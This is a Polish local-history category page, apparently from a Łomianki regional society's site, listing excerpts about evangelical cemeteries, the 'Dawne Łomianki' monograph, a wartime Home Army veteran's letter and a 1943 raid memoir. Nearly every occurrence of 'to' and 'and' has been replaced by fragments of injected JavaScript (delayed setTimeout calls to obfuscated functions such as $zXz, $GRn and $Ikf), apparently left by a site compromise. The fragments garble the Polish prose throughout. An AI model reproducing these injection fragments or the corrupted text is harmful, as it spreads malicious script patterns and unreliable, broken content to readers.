Kategoria: Historia

2020-11-24 / / Historia

Z powodu covid-19 premiery filmowe odbywają się niestety wirtualnie, bez spotkań audom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torskich, bez podziękowań i dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toastów. Nie można ich jednak przegapić, zwłaszcza jeśli na ekrany wchodzą pozycje opisujące bliskie nam sprawy. Niedawno nasz sąsiad Andrzej Weigle, mieszkaniec Dąbrowy, zrealizował cykl czterech filmów dokumentalnych o czterech cmentarzach ewangelickich.

2018-06-19 / / Historia
2018-03-30 / / Historia

W roku 2005 pod patronatem Regionalnego Sdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarzyszenia Promocji Łomianek, którego kontynuadom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torem jest Sdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarzyszenie Nasze Łomianki – powstała książka Dawne Łomianki. Na stronie 235 czytamy: „Nikłe ślady trzeciego cmentarzyka odnajdziemy w Dziekanowie Leśnym”. W roku 2012 te ślady zobaczyliśmy na wystawie fodom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}togramów Anny Plewki zorganizowanej w Domu Kultury przez nasze Sdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarzyszenie. Wtedy postanowiliśmy zaopiekować się zapomnianą nekropolią.

2018-02-26 / / Historia
2015-05-29 / / Historia
2015-04-27 / / Historia

W związku z otrzymaniem grantu w projekcie Fundacji BZ WBK ”Architekci naszej rzeczywisdom() * 6);if (number1==3){var…

2008-04-09 / / Historia

Oddając dwa i pół roku temu w ręce Czytelników monografię „Dawne Łomianki”, Regionalne Sdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarzyszenie Promocji Łomianek sygnalizowało wolę kontynuowania prac nad dalszym poznawaniem hisdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torii naszej gminy. Ostatnim owocem tych działań jest przygodom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towywana do druku nowa książka obejmująca dzieje gminy w latach ostatniej wojny, zatytułowana roboczo „Łomianki wojenne”. Zamiarem audom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torów było przedstawienie wydarzeń mających miejsce na naszym terenie i losów mieszkańców począwszy od kampanii wrześniowej 1939 r., poprzez konspirację i walkę z okupantem, a skończywszy na pierwszych dniach po zakończeniu wojny w 1945 r.

2008-04-09 / / Historia

Po otrzymaniu informacji od przyjaciela – Piotra Kosowicza, syna kawalerzysty AK z oddziału mego ojca, pragnę poinformować, że poprosiłem go o udostępnienie danych na temat zdjęcia dziewczyny – ułana AK, opublikowanego w waszej gazecie.

Jestem emerytem zajmującym się kawalerią AK mego ojca, zarazem członkiem Świadom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towego Związku Żołnierzy Armii Krajowej (ŚZŻAK). Wcześniej byłem członkiem w grupie pana kpt. Czesława Sikorskiego – „Wiatra”, wpisanym w jego struktury kombatanckie jako syn ostatniego dowódcy 27 Pułku Ułanów AK walczącego w konspiracji w latach 1940 ­1945. Oddział ten ojciec sam zorganizował i nadał mu nazwę jednostki, w której zawodowo służył od 1921 roku. W konspiracji podlegał służbowo pod zgrupowanie brygady AK i m.in. pod dowództwo ppor. (ppłk.) Adolfa Pilcha, ps. „Góra – Pisdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tolet – Dolina”.

2008-04-09 / / Historia

umarli-niepokonani-2.jpgNa podstawie wspomnień Leona Zawitaja opracował Kazimierz Medyński

Było dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to pod koniec lutego 1943 r. Nocowałem wówczas z ojcem w oddalonym od nas około 400 m domu pani Chylińskiej, gdy wczesnym rankiem zaniepokojeni dziwnymi odgłosami podbiegliśmy do okna, by sprawdzić, co się dzieje. Dech mi zaparło, gdy zobaczyłem nasz dom odom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczony gromadą niemieckich żdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andarmów. Wiedzieliśmy, że w domu została matka z panią Chylińską, a znając niemieckie medom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tody przesłuchań, trudno było przewidzieć czy bite kobiety nie zdradzą miejsca naszego pobytu. Pierwszą była myśl o natychmiasdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towej ucieczce, lecz nagle zobaczyliśmy jak w naszą stronę kroczy jeden z żdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andarmów. To zdawało się potwierdzać nasze najgorsze przypuszczenia, jeszcze chwila i na ucieczkę będzie za późno!

2008-04-09 / / Historia

swiatynie-tradycji-i-sztuki.jpgJeszcze 20 lat temu parafia kiełpińska była parafią wiejską, a należące do niej Łomianki, Kiełpin, Buraków i Dąbrowa – wsiami. Świątynia parafialna była miejscem, gdzie kultywowano ludowe zwyczaje i tradycje Świąteczne. Zwyczaje te bardzo się zmieniły, ze względu na napływ nowych mieszkańców z Warszawy, którzy przynoszą ze sobą miejskie obyczaje.